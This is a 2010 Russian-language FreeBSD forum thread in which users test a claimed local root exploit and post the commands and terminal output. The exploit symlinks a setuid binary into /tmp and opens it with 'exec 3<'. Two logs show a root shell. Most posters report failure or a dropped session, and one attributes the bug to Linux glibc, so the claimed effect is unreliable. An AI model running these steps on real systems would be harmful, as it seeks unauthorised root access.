Страница 1 из 1
Может замечали...
Добавлено: 2010-10-19 19:44:23
r00t
Код: Выделить всё
[20:35 alex@darkstar /home/alex]% mkdir /tmp/exploit
[20:35 alex@darkstar /home/alex]% ln -s /sbin/mount_msdosfs /tmp/exploit/target
[20:36 alex@darkstar /home/alex]% exec 3< /tmp/exploit/target
3: Command not found.
[20:36 root@darkstar /home/alex]# whoami
root
[20:37 root@darkstar /home/alex]# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
[20:37 root@darkstar /home/alex]# uname -a
FreeBSD darkstar.velko2000.local 8.0-RC2 FreeBSD 8.0-RC2 #0: Tue Jan 26 11:45:15 MSK 2010 alex@darkstar.domain.local:/usr/obj/usr/src/sys/NG_PF_KERNEL i386
Вот это реальная
жопа на самом деле. Первый достойный и простой локальный эксплоит за многие годы.
Источник:
http://seclists.org/fulldisclosure/2010/Oct/257
Re: Может замечали...
Добавлено: 2010-10-19 19:50:03
Alex Keda
Код: Выделить всё
srv1$ sh -E
$ exec 3< /tmp/exploit/target
$ id
uid=1000(lissyara) gid=0(wheel) groups=0(wheel)
$
$ rm -rf /tmp/exploit
$ id
uid=1000(lissyara) gid=0(wheel) groups=0(wheel)
$ mkdir /tmp/exploit
$ ln -s /sbin/mount_msdosfs /tmp/exploit/target
$ exec 3< /tmp/exploit/target
$ whoami
lissyara
$ uname -a
FreeBSD srv1.host-food.ru 8.1-RC2 FreeBSD 8.1-RC2 #0: Fri Jul 16 13:44:36 MSD 2010 lissyara@srv1.host-food.ru:/home/usr_moved/obj/home/usr_moved/src/sys/HOST-FOOD i386
$
в tcsh выкидывает из ssh на
Re: Может замечали...
Добавлено: 2010-10-19 19:59:09
Alex Keda
Код: Выделить всё
srv1$ bash
[lissyara@srv1 ~]$ exec 3 < /tmp/exploit/target
bash: exec: 3: не найден
[lissyara@srv1 ~]$ exit
srv1$
Re: Может замечали...
Добавлено: 2010-10-19 20:04:28
Alex Keda
это не та ли бага с ld.so которую летом ли весной фиксили?
Re: Может замечали...
Добавлено: 2010-10-19 20:06:11
r00t
Код: Выделить всё
[21:11 alex@darkstar /home/alex]% id
uid=1001(alex) gid=1001(alex) groups=1001(alex),0(wheel)
[21:11 alex@darkstar /home/alex]% mkdir -p /tmp/exploit
[21:11 alex@darkstar /home/alex]% ln -s /sbin/ping /tmp/exploit/target
ln: /tmp/exploit/target: File exists
[21:11 alex@darkstar /home/alex]% rm /tmp/exploit/target
[21:11 alex@darkstar /home/alex]% ln -s /sbin/ping /tmp/exploit/target
[21:11 alex@darkstar /home/alex]% exec 3< /tmp/exploit/target
3: Command not found.
[21:12 root@darkstar /home/alex]# echo $SHELL
/bin/csh
[21:12 root@darkstar /home/alex]# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
[/code]
Re: Может замечали...
Добавлено: 2010-10-19 20:08:02
r00t
Код: Выделить всё
[21:11 alex@darkstar /home/alex]% id
uid=1001(alex) gid=1001(alex) groups=1001(alex),0(wheel)
[21:11 alex@darkstar /home/alex]% mkdir -p /tmp/exploit
[21:11 alex@darkstar /home/alex]% ln -s /sbin/ping /tmp/exploit/target
ln: /tmp/exploit/target: File exists
[21:11 alex@darkstar /home/alex]% rm /tmp/exploit/target
[21:11 alex@darkstar /home/alex]% ln -s /sbin/ping /tmp/exploit/target
[21:11 alex@darkstar /home/alex]% exec 3< /tmp/exploit/target
3: Command not found.
[21:12 root@darkstar /home/alex]# echo $SHELL
/bin/csh
[21:12 root@darkstar /home/alex]# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
[/code]
Нет, это что-то новое. в csh попробуй ))
Re: Может замечали...
Добавлено: 2010-10-19 20:46:20
hizel
Re: Может замечали...
Добавлено: 2010-10-19 22:58:39
FreeBSP
Код: Выделить всё
[@~]$ mkdir -p /tmp/exploit
[@~]$ ln -s /sbin/mount_msdosfs /tmp/exploit/target
[@~]$ exec 3< /tmp/exploit/target
[@~]$ id -u
1001
[@~]$ uname -mrs
7.2-RELEASE-p8 i386
[@~]$ rm -rf /tmp/exploit
[@~]$
тенех вылетает на exec. может оно ломается, но ломается неправильно?
Re: Может замечали...
Добавлено: 2010-10-19 23:04:00
Alex Keda
фиксили в ld.so именно такой момент.
и именно выход был сделан на попытку повысить привелегии
искать лень. тут же где-то тема
Re: Может замечали...
Добавлено: 2010-10-20 9:41:16
schizoid
шота у меня не работает... Фря 7.1-RELEASE-p11 и 6.3-RELEASE-p13
Re: Может замечали...
Добавлено: 2010-10-20 9:46:52
terminus
Так это же линуксовая фигня! Читайте опеннет - там бурление говен среди линуксойдов и требования отставки столмана в связи с утратой доверия к libc.
Да и вон у топикстартера хостнейм darkstar - слекварщиг вестимо...
Re: Может замечали...
Добавлено: 2010-10-20 9:59:29
Гость
Код: Выделить всё
$ mkdir -p /tmp/exploit
$ ln -s /sbin/mount_msdosfs /tmp/exploit/target
$ exec 3< /tmp/exploit/target
$ id -u
1001
$ uname -psr
FreeBSD 6.4-RELEASE-p6 i386
$ whereis bash
bash: /usr/ports/shells/bash
$ csh
% exec 3< /tmp/exploit/target
3: Command not found.
После этого вылетел из SSH-сессии. Захожу заново, шелл по умолчанию - csh
Код: Выделить всё
% exec 3< /tmp/exploit/target
3: Command not found.
# id -u
0
Re: Может замечали...
Добавлено: 2010-10-20 10:05:47
hedgehog
freebsd 8.1 amd64, zfs. пробую на виртуалке - не выходит. после exec просто вываливаюсь из текущего шелла. пробовал включать setuid для /tmp. обновись, а?
кстати, судя по опеннету надо создавать хардлинк, монтировать /proc и еще чего-то крутить.
Код: Выделить всё
$ ln /sbin/ping /tmp/exploit/target
ln: /tmp/exploit/target: Cross-device link
привет монтирующим только / ?